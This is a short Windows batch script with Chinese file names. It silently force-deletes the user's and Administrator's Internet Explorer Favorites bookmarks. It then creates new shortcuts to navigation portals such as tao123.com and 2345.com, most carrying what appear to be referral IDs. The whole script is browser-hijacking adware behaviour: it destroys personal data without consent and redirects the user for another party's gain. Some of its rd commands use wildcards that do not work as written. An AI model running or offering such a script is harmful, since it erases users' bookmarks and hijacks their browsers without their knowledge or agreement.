del /f /s /q "D:\My Documents\Favorites\" "%USERPROFILE%\Favorites\*.url"
del /f /s /q "C:\Documents and Settings\Administrator\Favorites\*.url" 
rd /q/s %USERPROFILE%\Favorites\链接\*.url
rd /q/s %USERPROFILE%\Favorites\*.url

set result="%USERPROFILE%\Favorites\淘宝网址导航.url"
echo [InternetShortcut] >> %result%
echo URL="http://www.tao123.com/?1505" >> %result%

set result="%USERPROFILE%\Favorites\2345网址导航.url"
echo [InternetShortcut] >> %result%
echo URL="http://www.2345.com/?4189" >> %result%

set result="%USERPROFILE%\Favorites\网址导航.url"
echo [InternetShortcut] >> %result%
echo URL="http://www.82147.com/win56789.html" >> %result%

set result="%USERPROFILE%\Favorites\链接\淘宝网址导航.url"
echo [InternetShortcut] >> %result%
echo URL="http://www.tao123.com/?1505" >> %result%

set result="%USERPROFILE%\Favorites\链接\2345网址导航.url"
echo [InternetShortcut] >> %result%
echo URL="http://www.2345.com/?4189" >> %result%

set result="%USERPROFILE%\Favorites\链接\网址导航.url"
echo [InternetShortcut] >> %result%
echo URL="http://www.82147.com/win56789.html" >> %result%